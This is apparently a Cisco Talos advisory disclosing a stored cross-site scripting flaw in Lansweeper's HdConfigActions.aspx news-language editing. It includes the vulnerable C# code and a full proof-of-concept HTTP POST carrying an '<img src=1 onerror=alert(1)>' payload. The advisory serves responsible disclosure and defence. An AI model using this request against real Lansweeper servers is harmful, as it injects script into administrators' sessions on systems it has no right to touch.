Talos Vulnerability Report


Lansweeper lansweeper HdConfigActions.aspx altertextlanguages stored cross-site scripting vulnerability

December 1, 2022
CVE Number



A stored cross-site scripting vulnerability exists in the HdConfigActions.aspx altertextlanguages functionality of Lansweeper lansweeper A specially-crafted HTTP request can lead to arbitrary Javascript code injection. An attacker can send an HTTP request to trigger this vulnerability.


The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Lansweeper lansweeper


lansweeper - https://www.lansweeper.com/


9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H


CWE-80 - Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)


Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.

An exploitable stored xss vulnerability is related with an action: Configuration -> News page->Alter language data choose any language other than english. Vulnerable code is located inside the \LS\CF\HdConfigActions.cs file. Let us take a close look at the vulnerable source code :

Line 1 	int newsID = int.Parse(current.Request["id"]);
Line 2 	string reqType = current.Request["type"];
Line 3 	(...)
Line 4 		case "news":		
Line 5 			delteSQL  = "DELETE FROM htblnewsLang WHERE newsid = @p1";
Line 6 			insertSQL = "INSERT htblnewsLang (newsid, [language], description, [text]) VALUES (@p1,@p2,@p3,@p4)";		
Line 7 			break;
Line 8 		(...)
Line 9 		DB.ExecuteNonQuery(delteSQL, DB.NewDBParameter("@p1", newsID));
Line 10		foreach (Language langID in Enum.GetValues(typeof(Language)))
Line 11		{
Line 12			if (langID != Language.Eng)
Line 13			{
Line 14				DB.ExecuteNonQuery(insertSQL, DB.NewDBParameter("@p1", newsID), DB.NewDBParameter("@p2", (int)langID), DB.NewDBParameter("@p3", current.Request["lang" + (int)langID] ?? ""), DB.NewDBParameter("@p4", array[(int)(langID - 1)]), DB.NewDBParameter("@p5", (reqType == "news") ? HtmlSanitizer.SanitizeHtml(dictionary2[langID]) : dictionary2[langID]));
Line 15			}
Line 16		}

where part of the request looks like this : REQUEST

POST /configuration/HdConfigActions.aspx?action=altertextlanguages&type=news&id=3 HTTP/1.1
lang1=eng_new&lang1x=eng_new_text&lang24=xss_entry&lang24x=<img src=1 onerror=alert(1)>	

During the news alter operation, there is a special insert sql query for languages other than english line 12. As you might notice, none of the passed news parameters is sanitized before insertion to the database:

description  - lang24=xss_entry
news tesxt   - lang24x=<img src=1 onerror=alert(1)>

There is an attempt at sanitization made for paramter 5, but news insert query has just 4 values. News text does not seem to be sanitize during output either. Injected code will be automatically triggered each time when a user attempts to edit this news.

Exploit Proof of Concept


POST /configuration/HdConfigActions.aspx?action=altertextlanguages&type=news&id=3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 837
Connection: close
Cookie: UserSettings=language=24; ASP.NET_SessionId=s3bal3hgmqgscqihm3vxj5gt; custauth=username=hacker&userdomain=; __RequestVerificationToken_Lw__=zP2evPOU4gLNF/pF3R1XPsIP7ceImHsHKoqy7GfYwDnIwHnDJKt3r5 0bFTXNS/XpEAiyEFBVT2ekfSLIPgVMULtvi8Ae4qLSYcUO0UH90vcERUKMi72E3I2yEJexWSyNKlA8gcXlfMPYbc0a94Dji44b2cNn4aS0KGOSUQBn/0=

__VIEWSTATE=&lang1=eng_new&lang1x=eng_new_text&lang24=xss_entry&lang24x=<img src=1 onerror=alert(1)>&lang30=Magic&lang30x=<div style="font:12px Arial,Verdana;font-size:12px;font-family:Arial,Verdana;">Some news text<br style=""></div>&lang34=Magic&lang34x=<div style="font:12px Arial,Verdana;font-size:12px;font-family:Arial,Verdana;">Some news text<br style=""></div>&id=3&type=news&undefined=undefined&chksm=6740673596&__RequestVerificationToken=LCEp+vTDGHE23M5WuFdmjkRUlRS/DSdWiI/M7gs3RxuLXvxiMI9MiWihGndb3j1GaSLAhRww0iwriAEMcPmF4AzPEN50y2dmrSH3dUNVM+n0PtKlrw8vFGFigInLwkFYebmGC/fbz0Lo2lx7Myi0Ce2huzL/7QsGyGsj4We5WVg=


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
x-frame-options: SAMEORIGIN
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 03 Jun 2022 09:01:34 GMT
Connection: close
Content-Length: 167


2022-06-27 - Vendor Disclosure
2022-11-29 - Vendor Patch Release
2022-12-01 - Public Release


Discovered by Marcin 'Icewall' Noga of Cisco Talos.